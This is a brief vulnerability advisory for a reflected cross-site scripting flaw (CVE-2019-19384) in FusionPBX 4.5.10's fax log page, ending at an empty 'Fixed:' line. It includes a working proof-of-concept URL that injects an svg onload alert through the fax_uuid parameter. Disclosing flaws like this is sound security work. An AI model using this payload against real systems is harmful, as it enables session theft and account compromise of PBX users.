FusionPBX file app/fax/fax_log_view.php "fax_uuid" parameter XSS (CVE-2019-19384)
Cross-site scripting (XSS) vulnerability in file app/fax/fax_log_view.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "fax_uuid" parameter.
proof of concept:
https://domain/app/fax/fax_log_view.php?fax_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca
Fixed: